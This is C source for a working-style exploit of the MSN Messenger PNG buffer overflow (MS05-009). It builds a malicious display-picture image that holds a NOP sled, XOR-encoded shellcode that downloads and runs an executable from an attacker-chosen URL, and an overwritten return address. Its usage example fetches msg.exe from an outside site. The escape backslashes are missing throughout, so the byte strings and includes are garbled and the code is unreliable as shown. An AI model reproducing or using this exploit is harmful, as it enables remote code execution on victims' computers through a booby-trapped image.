/* 
* 
* MSN Messenger PNG Image Buffer Overflow Download Shellcoded Exploit (MS05-009) 
* Bug discoveried by Core Security Technologies (www.coresecurity.com) 
* Exploit coded By ATmaCA 
* Copyright ©2002-2005 AtmacaSoft Inc. All Rights Reserved. 
* Web: http://www.atmacasoft.com 
* E-Mail:   
* Credit to kozan and delikon 
* Usage:exploit <OutputPath> <Url> 
* 
*/ 

/* 
* 
* Tested with MSN Messenger 6.2.0137 
* This vulnerability can be exploited on Windows 2000 (all service 
packs) 
* and Windows XP (all service packs) that run vulnerable 
* clients of MSN Messenger. 
* 
*/ 

/* 
* 
* After creating vuln png image, open 
* MSN Messenger and select it as your display picture in 
* "Tools->Change Display Picture". 
* 
*/ 

#include <stdio> 
#include <stdlib> 
#include <conio> 
#include <string> 


#ifdef __BORLANDC__ 
#include <mem> 
#endif 

#define NOP 0x90 

char png_header[] = 
"x89x50x4Ex47x0Dx0Ax1Ax0Ax00x00x00x0Dx49x48x44x52" 
"x00x00x00x40x00x00x00x40x08x03x00x00x00x9DxB7x81" 
"xECx00x00x01xB9x74x52x4Ex53"; 

char pngeof[] = "x90x90x90x59xE8x47xFExFFxFF"; 

/* Generic win32 http download shellcode 
xored with 0x1d by delikon (http://delikon.de/) */ 
char shellcode[] = "xEB" 
"x10x58x31xC9x66x81xE9x22xFFx80x30x1Dx40xE2xFAxEBx05xE8xEBxFF" 
"xFFxFFxF4xD1x1Dx1Dx1Dx42xF5x4Bx1Dx1Dx1Dx94xDEx4Dx75x93x53x13" 
"xF1xF5x7Dx1Dx1Dx1Dx2CxD4x7BxA4x72x73x4Cx75x68x6Fx71x70x49xE2" 
"xCDx4Dx75x2Bx07x32x6DxF5x5Bx1Dx1Dx1Dx2CxD4x4Cx4Cx90x2Ax4Bx90" 
"x6Ax15x4Bx4CxE2xCDx4Ex75x85xE3x97x13xF5x30x1Dx1Dx1Dx4Cx4AxE2" 
"xCDx2CxD4x54xFFxE3x4Ex75x63xC5xFFx6ExF5x04x1Dx1Dx1DxE2xCDx48" 
"x4Bx79xBCx2Dx1Dx1Dx1Dx96x5Dx11x96x6Dx01xB0x96x75x15x94xF5x43" 
"x40xDEx4Ex48x4Bx4Ax96x71x39x05x96x58x21x96x49x18x65x1CxF7x96" 
"x57x05x96x47x3Dx1CxF6xFEx28x54x96x29x96x1CxF3x2CxE2xE1x2CxDD" 
"xB1x25xFDx69x1AxDCxD2x10x1CxDAxF6xEFx26x61x39x09x68xFCx96x47" 
"x39x1CxF6x7Bx96x11x56x96x47x01x1CxF6x96x19x96x1CxF5xF4x1Fx1D" 
"x1Dx1Dx2CxDDx94xF7x42x43x40x46xDExF5x32xE2xE2xE2x70x75x75x33" 
"x78x65x78x1D"; 

FILE *di; 
int i = 0; 
short int weblength; 
char *web; 
char *pointer = NULL; 
char *newshellcode; 

/*xor cryptor*/ 
char *Sifrele(char *Name1) 
{ 
char *Name=Name1; 
char xor=0x1d; 
int Size=strlen(Name); 
for(i=0;i<Size;i++) 
Name[i]=Name[i]^xor; 
return Name; 
} 


void main(int argc, char *argv[]) 
{ 

if (argc < 3) 
{ 
printf("MSN Messenger PNG Image Buffer Overflow Download Shellcoded Exploitn"); 
printf("Bug discoveried by Core Security Technologies (www.coresecurity.com)n"); 
printf("Exploit coded By ATmaCAn"); 
printf("Copyright ©2002-2005 AtmacaSoft Inc. All Rights Reserved.n"); 
printf("Web: http://www.atmacasoft.comn"); 
printf("E-Mail:  n"); 
printf("Credit to kozan and delikonnn"); 
printf("tUsage:exploit <OutputPath> <Url>n"); 
printf("tExample:exploit vuln.png http://www.atmacasoft.com/exp/msg.exen"); 

} 


web = argv[2]; 


if( (di=fopen(argv[1],"wb")) == NULL ) 
{ 
printf("Error opening file!n"); 

} 
for(i=0;i<sizeof(png_header)-1;i++) 
fputc(png_header[i],di); 

/*stuff in a couple of NOPs*/ 
for(i=0;i<99;i++) 
fputc(NOP,di); 

weblength=(short int)0xff22; 
pointer=strstr(shellcode,"x22xff"); 
weblength-=strlen(web)+1; 
memcpy(pointer,&weblength,2); 
newshellcode = new char[sizeof(shellcode)+strlen(web)+1]; 
strcpy(newshellcode,shellcode); 
strcat(newshellcode,Sifrele(web)); 
strcat(newshellcode,"x1d"); 

//shell code 
for(i=0;i<strlen(newshellcode);i++) 
fputc(newshellcode[i],di); 


for(i=0;i<(83-strlen(web));i++) //NOPs 
fputc(NOP,di); 

/*Overwriting the return address (EIP)*/ 
/*0x005E0547 - ret */ 
fputc(0x47,di); 
fputc(0x05,di); 
fputc(0x5e,di); 
fputc(0x00,di); 

for(i=0;i<sizeof(pngeof)-1;i++) 
fputc(pngeof[i],di); 

printf("Vulnarable png file %s has been generated!n",argv[1]); 

fclose(di); 
}